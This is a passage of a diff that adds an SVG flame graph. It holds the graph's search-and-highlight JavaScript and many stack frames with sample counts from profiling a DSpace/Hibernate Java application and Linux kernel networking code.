+		var el = document.querySelectorAll("#frames rect");
+		for (var i = 0; i < el.length; i++) {
+			orig_load(el[i], "fill")
+		}
+	}
+	function search_prompt() {
+		if (!searching) {
+			var term = prompt("Enter a search term (regexp " +
+			    "allowed, eg: ^ext4_)"
+			    + (ignorecase ? ", ignoring case" : "")
+			    + "\nPress Ctrl-i to toggle case sensitivity", "");
+			if (term != null) {
+				currentSearchTerm = term;
+				search();
+			}
+		} else {
+			reset_search();
+			searching = 0;
+			currentSearchTerm = null;
+			searchbtn.classList.remove("show");
+			searchbtn.firstChild.nodeValue = "Search"
+			matchedtxt.classList.add("hide");
+			matchedtxt.firstChild.nodeValue = ""
+		}
+	}
+	function search(term) {
+		if (currentSearchTerm === null) return;
+		var term = currentSearchTerm;
+
+		var re = new RegExp(term, ignorecase ? 'i' : '');
+		var el = document.getElementById("frames").children;
+		var matches = new Object();
+		var maxwidth = 0;
+		for (var i = 0; i < el.length; i++) {
+			var e = el[i];
+			var func = g_to_func(e);
+			var rect = find_child(e, "rect");
+			if (func == null || rect == null)
+				continue;
+
+			// Save max width. Only works as we have a root frame
+			var w = parseFloat(rect.attributes.width.value);
+			if (w > maxwidth)
+				maxwidth = w;
+
+			if (func.match(re)) {
+				// highlight
+				var x = parseFloat(rect.attributes.x.value);
+				orig_save(rect, "fill");
+				rect.attributes.fill.value = "rgb(230,0,230)";
+
+				// remember matches
+				if (matches[x] == undefined) {
+					matches[x] = w;
+				} else {
+					if (w > matches[x]) {
+						// overwrite with parent
+						matches[x] = w;
+					}
+				}
+				searching = 1;
+			}
+		}
+		if (!searching)
+			return;
+
+		searchbtn.classList.add("show");
+		searchbtn.firstChild.nodeValue = "Reset Search";
+
+		// calculate percent matched, excluding vertical overlap
+		var count = 0;
+		var lastx = -1;
+		var lastw = 0;
+		var keys = Array();
+		for (k in matches) {
+			if (matches.hasOwnProperty(k))
+				keys.push(k);
+		}
+		// sort the matched frames by their x location
+		// ascending, then width descending
+		keys.sort(function(a, b){
+			return a - b;
+		});
+		// Step through frames saving only the biggest bottom-up frames
+		// thanks to the sort order. This relies on the tree property
+		// where children are always smaller than their parents.
+		var fudge = 0.0001;	// JavaScript floating point
+		for (var k in keys) {
+			var x = parseFloat(keys[k]);
+			var w = matches[keys[k]];
+			if (x >= lastx + lastw - fudge) {
+				count += w;
+				lastx = x;
+				lastw = w;
+			}
+		}
+		// display matched percent
+		matchedtxt.classList.remove("hide");
+		var pct = 100 * count / maxwidth;
+		if (pct != 100) pct = pct.toFixed(1)
+		matchedtxt.firstChild.nodeValue = "Matched: " + pct + "%";
+	}
+]]>
+</script>
+<rect x="0.0" y="0" width="1200.0" height="950.0" fill="url(#background)"  />
+<text id="title" x="600.00" y="24" >Flame Graph</text>
+<text id="details" x="10.00" y="933" > </text>
+<text id="unzoom" x="10.00" y="24" class="hide">Reset Zoom</text>
+<text id="search" x="1090.00" y="24" >Search</text>
+<text id="ignorecase" x="1174.00" y="24" >ic</text>
+<text id="matched" x="1090.00" y="933" > </text>
+<g id="frames">
+<g >
+<title>Java_java_net_SocketOutputStream_socketWrite0 (1 samples, 0.08%)</title><rect x="1149.7" y="245" width="1.0" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1152.73" y="255.5" ></text>
+</g>
+<g >
+<title>ip_local_out (24 samples, 1.90%)</title><rect x="88.7" y="629" width="22.4" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="91.67" y="639.5" >i..</text>
+</g>
+<g >
+<title>__wake_up_common (1 samples, 0.08%)</title><rect x="98.0" y="245" width="1.0" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="101.03" y="255.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/FullTextContentStreams:::&lt;init&gt; (4 samples, 0.32%)</title><rect x="778.9" y="517" width="3.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="781.87" y="527.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/tree/DefaultExpressionEngine:::processSubNodes (1 samples, 0.08%)</title><rect x="848.2" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="851.17" y="431.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.08%)</title><rect x="158.0" y="405" width="0.9" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="160.97" y="415.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (12 samples, 0.95%)</title><rect x="1178.8" y="693" width="11.2" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="1181.76" y="703.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::sequence (1 samples, 0.08%)</title><rect x="844.4" y="469" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="847.43" y="479.5" ></text>
+</g>
+<g >
+<title>sock_sendmsg (33 samples, 2.62%)</title><rect x="84.0" y="789" width="30.9" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="86.98" y="799.5" >so..</text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.08%)</title><rect x="1150.7" y="389" width="0.9" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1153.67" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1161.9" y="181" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1164.90" y="191.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.08%)</title><rect x="1146.9" y="485" width="1.0" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="1149.92" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::wasInitialized (1 samples, 0.08%)</title><rect x="778.9" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="781.87" y="399.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (2 samples, 0.16%)</title><rect x="1117.9" y="357" width="1.9" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="1120.89" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/proxy/pojo/javassist/JavassistLazyInitializer:::invoke (4 samples, 0.32%)</title><rect x="758.3" y="517" width="3.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushCollections (10 samples, 0.79%)</title><rect x="326.5" y="453" width="9.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="329.54" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (74 samples, 5.87%)</title><rect x="672.1" y="469" width="69.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="675.11" y="479.5" >org/hib..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/WrapVisitor:::processValue (6 samples, 0.48%)</title><rect x="1076.7" y="405" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1079.68" y="415.5" ></text>
+</g>
+<g >
+<title>JVM_IHashCode (10 samples, 0.79%)</title><rect x="822.9" y="389" width="9.4" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="825.89" y="399.5" ></text>
+</g>
+<g >
+<title>org/dspace/app/util/DailyFileAppender:::subAppend (2 samples, 0.16%)</title><rect x="791.0" y="325" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="794.05" y="335.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (3 samples, 0.24%)</title><rect x="1089.8" y="405" width="2.8" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="1092.79" y="415.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.08%)</title><rect x="158.0" y="389" width="0.9" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="160.97" y="399.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::atom (1 samples, 0.08%)</title><rect x="844.4" y="453" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="847.43" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/util/collections/IdentityMap:::entryArray (5 samples, 0.40%)</title><rect x="267.5" y="421" width="4.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="270.54" y="431.5" ></text>
+</g>
+<g >
+<title>tcp_rcv_established (2 samples, 0.16%)</title><rect x="98.0" y="309" width="1.9" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="101.03" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/InputStreamEntity:::writeTo (1 samples, 0.08%)</title><rect x="1159.1" y="325" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1162.10" y="335.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::&lt;init&gt; (1 samples, 0.08%)</title><rect x="790.1" y="245" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="793.11" y="255.5" ></text>
+</g>
+<g >
+<title>schedule (12 samples, 0.95%)</title><rect x="1178.8" y="741" width="11.2" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="1181.76" y="751.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/EntityEnclosingRequestWrapper$EntityWrapper:::writeTo (10 samples, 0.79%)</title><rect x="792.9" y="357" width="9.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="795.92" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/CollectionEntry:::getOrphans (9 samples, 0.71%)</title><rect x="1112.3" y="405" width="8.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1115.27" y="415.5" ></text>
+</g>
+<g >
+<title>java/util/AbstractMap:::get (3 samples, 0.24%)</title><rect x="1142.2" y="453" width="2.8" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1145.24" y="463.5" ></text>
+</g>
+<g >
+<title>itable stub (5 samples, 0.40%)</title><rect x="674.9" y="453" width="4.7" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="677.92" y="463.5" ></text>
+</g>
+<g >
+<title>futex_wait_queue_me (4 samples, 0.32%)</title><rect x="10.0" y="757" width="3.7" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="13.00" y="767.5" ></text>
+</g>
+<g >
+<title>inet6_recvmsg (23 samples, 1.83%)</title><rect x="60.6" y="773" width="21.5" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="63.57" y="783.5" >i..</text>
+</g>
+<g >
+<title>org/hibernate/type/EntityType:::nullSafeGet (1 samples, 0.08%)</title><rect x="314.4" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="317.37" y="431.5" ></text>
+</g>
+<g >
+<title>event_sched_in.isra.0 (1 samples, 0.08%)</title><rect x="13.7" y="597" width="1.0" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="16.75" y="607.5" ></text>
+</g>
+<g >
+<title>Java_java_lang_Throwable_fillInStackTrace (1 samples, 0.08%)</title><rect x="797.6" y="133" width="0.9" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="800.60" y="143.5" ></text>
+</g>
+<g >
+<title>ip_protocol_deliver_rcu (3 samples, 0.24%)</title><rect x="97.1" y="357" width="2.8" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="100.10" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/DefaultHttpResponseParser:::parseHead (1 samples, 0.08%)</title><rect x="1158.2" y="325" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1161.16" y="335.5" ></text>
+</g>
+<g >
+<title>nft_do_chain_inet (9 samples, 0.71%)</title><rect x="101.8" y="389" width="8.4" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="104.78" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::preProcess (1 samples, 0.08%)</title><rect x="802.3" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="805.29" y="463.5" ></text>
+</g>
+<g >
+<title>exit_to_usermode_loop (2 samples, 0.16%)</title><rect x="114.9" y="821" width="1.9" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="117.89" y="831.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::hasQueuedOperations (1 samples, 0.08%)</title><rect x="333.1" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="336.10" y="447.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.08%)</title><rect x="817.3" y="389" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="820.27" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isComponentType (1 samples, 0.08%)</title><rect x="236.6" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="239.63" y="415.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (4 samples, 0.32%)</title><rect x="10.0" y="837" width="3.7" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="13.00" y="847.5" ></text>
+</g>
+<g >
+<title>perf_event_sched_in (1 samples, 0.08%)</title><rect x="114.9" y="741" width="0.9" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="117.89" y="751.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1135.7" y="293" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1138.68" y="303.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractType:::isCollectionType (1 samples, 0.08%)</title><rect x="734.9" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="737.86" y="463.5" ></text>
+</g>
+<g >
+<title>__sched_text_start (2 samples, 0.16%)</title><rect x="114.9" y="789" width="1.9" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="117.89" y="799.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/HierarchicalConfiguration:::getProperty (3 samples, 0.24%)</title><rect x="1142.2" y="501" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1145.24" y="511.5" ></text>
+</g>
+<g >
+<title>java/util/ArrayList:::&lt;init&gt; (1 samples, 0.08%)</title><rect x="802.3" y="357" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="805.29" y="367.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.08%)</title><rect x="753.6" y="437" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="756.59" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (20 samples, 1.59%)</title><rect x="554.1" y="453" width="18.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="557.11" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultSaveOrUpdateEventListener:::onSaveOrUpdate (1 samples, 0.08%)</title><rect x="1120.7" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1123.70" y="415.5" ></text>
+</g>
+<g >
+<title>ip_local_deliver_finish (3 samples, 0.24%)</title><rect x="97.1" y="373" width="2.8" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="100.10" y="383.5" ></text>
+</g>
+<g >
+<title>futex_wait (50 samples, 3.97%)</title><rect x="13.7" y="773" width="46.9" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="16.75" y="783.5" >fute..</text>
+</g>
+<g >
+<title>org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (3 samples, 0.24%)</title><rect x="1142.2" y="485" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1145.24" y="495.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::doSendRequest (1 samples, 0.08%)</title><rect x="815.4" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="818.40" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/AbstractHttpClientConnection:::sendRequestEntity (1 samples, 0.08%)</title><rect x="1149.7" y="373" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1152.73" y="383.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (23 samples, 1.83%)</title><rect x="60.6" y="837" width="21.5" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="63.57" y="847.5" >d..</text>
+</g>
+<g >
+<title>org/hibernate/type/ManyToOneType:::isDirty (1 samples, 0.08%)</title><rect x="193.6" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="196.56" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::doReceiveResponse (1 samples, 0.08%)</title><rect x="1158.2" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1161.16" y="415.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BmpCharProperty:::match (1 samples, 0.08%)</title><rect x="843.5" y="437" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="846.49" y="447.5" ></text>
+</g>
+<g >
+<title>vtable stub (1 samples, 0.08%)</title><rect x="865.0" y="405" width="1.0" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="868.03" y="415.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (1 samples, 0.08%)</title><rect x="843.5" y="405" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="846.49" y="415.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeQualifiedObjectFieldAccessorImpl:::get (1 samples, 0.08%)</title><rect x="1092.6" y="405" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="1095.60" y="415.5" ></text>
+</g>
+<g >
+<title>org/dspace/util/MultiFormatDateParser:::parse (2 samples, 0.16%)</title><rect x="1145.0" y="517" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1148.05" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/proxy/pojo/javassist/JavassistLazyInitializer:::invoke (1 samples, 0.08%)</title><rect x="777.0" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.00" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/pool/RouteSpecificPool:::getFree (1 samples, 0.08%)</title><rect x="1151.6" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1154.60" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.16%)</title><rect x="845.4" y="341" width="1.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="848.37" y="351.5" ></text>
+</g>
+<g >
+<title>update_sd_lb_stats (1 samples, 0.08%)</title><rect x="81.2" y="597" width="0.9" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="84.17" y="607.5" ></text>
+</g>
+<g >
+<title>Java_java_lang_Throwable_fillInStackTrace (1 samples, 0.08%)</title><rect x="817.3" y="213" width="0.9" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="820.27" y="223.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/TwoPhaseLoad:::doInitializeEntity (1 samples, 0.08%)</title><rect x="785.4" y="421" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="788.43" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/AbstractConfiguration:::getBoolean (4 samples, 0.32%)</title><rect x="845.4" y="485" width="3.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="848.37" y="495.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/AbstractHttpClientConnection:::sendRequestEntity (10 samples, 0.79%)</title><rect x="792.9" y="389" width="9.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="795.92" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/util/collections/IdentityMap:::entryArray (8 samples, 0.63%)</title><rect x="962.4" y="405" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="965.43" y="415.5" ></text>
+</g>
+<g >
+<title>JVM_FillInStackTrace (1 samples, 0.08%)</title><rect x="1150.7" y="213" width="0.9" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="1153.67" y="223.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/params/ModifiableSolrParams:::set (1 samples, 0.08%)</title><rect x="1147.9" y="469" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1150.86" y="479.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/StatefulPersistenceContext:::removeEntry (1 samples, 0.08%)</title><rect x="756.4" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="759.40" y="415.5" ></text>
+</g>
+<g >
+<title>java/io/InputStream:::read (1 samples, 0.08%)</title><rect x="815.4" y="293" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="818.40" y="303.5" ></text>
+</g>
+<g >
+<title>inet6_sendmsg (32 samples, 2.54%)</title><rect x="84.0" y="773" width="30.0" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="86.98" y="783.5" >in..</text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::loadCollection (1 samples, 0.08%)</title><rect x="761.1" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="764.08" y="415.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceContentInOriginalBundleFilterPlugin:::hasOriginalBundleWithContent (4 samples, 0.32%)</title><rect x="782.6" y="501" width="3.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="785.62" y="511.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor23:::invoke (2 samples, 0.16%)</title><rect x="777.0" y="453" width="1.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="780.00" y="463.5" ></text>
+</g>
+<g >
+<title>org/dspace/services/factory/DSpaceServicesFactory:::getInstance (1 samples, 0.08%)</title><rect x="867.8" y="501" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="870.84" y="511.5" ></text>
+</g>
+<g >
+<title>tick_sched_timer (1 samples, 0.08%)</title><rect x="87.7" y="613" width="1.0" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="90.73" y="623.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isDirty (1 samples, 0.08%)</title><rect x="1087.9" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1090.92" y="415.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/FullTextContentStreams:::buildFullTextList (4 samples, 0.32%)</title><rect x="778.9" y="501" width="3.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="781.87" y="511.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultLoadEventListener:::doLoad (3 samples, 0.24%)</title><rect x="758.3" y="437" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="447.5" ></text>
+</g>
+<g >
+<title>itable stub (9 samples, 0.71%)</title><rect x="691.8" y="437" width="8.4" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="694.78" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isDirty (5 samples, 0.40%)</title><rect x="188.9" y="389" width="4.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="191.87" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/AbstractEntityJoinWalker:::initAll (5 samples, 0.40%)</title><rect x="1007.4" y="437" width="4.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1010.38" y="447.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/ItemServiceImpl:::getCommunities (2 samples, 0.16%)</title><rect x="777.0" y="517" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.00" y="527.5" ></text>
+</g>
+<g >
+<title>Interpreter (1,118 samples, 88.73%)</title><rect x="118.6" y="773" width="1047.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="121.63" y="783.5" >Interpreter</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1150.7" y="293" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1153.67" y="303.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1143.2" y="373" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1146.17" y="383.5" ></text>
+</g>
+<g >
+<title>itable stub (4 samples, 0.32%)</title><rect x="184.2" y="389" width="3.7" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="187.19" y="399.5" ></text>
+</g>
+<g >
+<title>_new_instance_Java (1 samples, 0.08%)</title><rect x="531.6" y="405" width="1.0" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="534.63" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/tree/DefaultExpressionEngine:::findNodesForKey (2 samples, 0.16%)</title><rect x="847.2" y="437" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="850.24" y="447.5" ></text>
+</g>
+<g >
+<title>ip_queue_xmit (24 samples, 1.90%)</title><rect x="88.7" y="661" width="22.4" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="91.67" y="671.5" >i..</text>
+</g>
+<g >
+<title>nf_conntrack_tcp_packet (1 samples, 0.08%)</title><rect x="92.4" y="565" width="0.9" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="95.41" y="575.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::setOwner (1 samples, 0.08%)</title><rect x="413.6" y="421" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="416.63" y="431.5" ></text>
+</g>
+<g >
+<title>__ip_local_out (5 samples, 0.40%)</title><rect x="88.7" y="613" width="4.6" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="91.67" y="623.5" ></text>
+</g>
+<g >
+<title>java/util/HashSet:::add (15 samples, 1.19%)</title><rect x="822.9" y="421" width="14.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="825.89" y="431.5" ></text>
+</g>
+<g >
+<title>acpi_irq (1 samples, 0.08%)</title><rect x="1124.4" y="309" width="1.0" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="1127.44" y="319.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultAutoFlushEventListener:::onAutoFlush (142 samples, 11.27%)</title><rect x="871.6" y="453" width="133.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="874.59" y="463.5" >org/hibernate/ev..</text>
+</g>
+<g >
+<title>java/util/HashSet:::add (3 samples, 0.24%)</title><rect x="634.7" y="389" width="2.8" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="637.65" y="399.5" ></text>
+</g>
+<g >
+<title>try_to_wake_up (1 samples, 0.08%)</title><rect x="98.0" y="197" width="1.0" height="15.0" fill="rgb(237,105,105)" rx="2" ry="2" />
+<text  x="101.03" y="207.5" ></text>
+</g>
+<g >
+<title>org/jboss/logging/Log4jLogger:::isEnabled (1 samples, 0.08%)</title><rect x="647.8" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="650.76" y="431.5" ></text>
+</g>
+<g >
+<title>nft_do_chain (9 samples, 0.71%)</title><rect x="101.8" y="373" width="8.4" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="104.78" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.08%)</title><rect x="778.9" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
